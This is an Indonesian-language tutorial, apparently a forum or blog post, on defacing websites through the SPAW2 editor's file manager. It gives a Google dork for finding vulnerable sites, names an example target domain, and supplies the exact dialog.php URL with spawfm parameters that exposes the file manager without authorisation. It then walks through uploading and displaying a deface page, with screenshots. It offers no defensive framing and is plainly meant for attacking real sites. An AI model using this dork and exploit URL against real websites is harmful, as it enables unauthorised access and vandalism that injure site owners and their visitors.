Tutorial Deface asp

Filename	Tutorial Deface asp
Permission	rw-r--r--
Author	Lutfi rahman
Date and Time	14.59
Label
Action

google dork : inurl:"spaw2/uploads/files/"

setelah mencari kesana kemari misalnya kita udah dpt target..

example :

Code:

http://www.corporation22.com/cms/spaw2/uploads/files/Solar_modules/HS-122st.pdf

gimana lagi nih? okeh..

ganti spaw2/uploads/files/Solar_modules/HS-122st.pdf

menjadi

spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2⟨=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

sehingga menjadi

http://www.corporation22.com/cms/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2%E2%8C%A9=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

hmm gimana buat upload file deface kita??

begini

lihat pilihan folder di atas, pada link target yang telah di exploit Spaw td, kemudian ubah "images" menjadi "files"

seperti gambar :

[Image: 216711_115497381863480_100002096566712_1...9466_a.jpg]

kemudian upload

[Image: 207321_115498021863416_100002096566712_1...6993_a.jpg]

setelah selesai klik browse lalu upload file deface kalian..

seperti gambar :

[Image: 216507_115497471863471_100002096566712_1...7884_a.jpg]

kalo udah di upload gimana lagi supaya muncul hasil deface kita??
begini,

lihat dulu nama file yg kalian upload td apa.. setelah ketemu lihat disamping kanan kemudian klik [download files]

[Image: 217017_115499915196560_100002096566712_1...4444_a.jpg]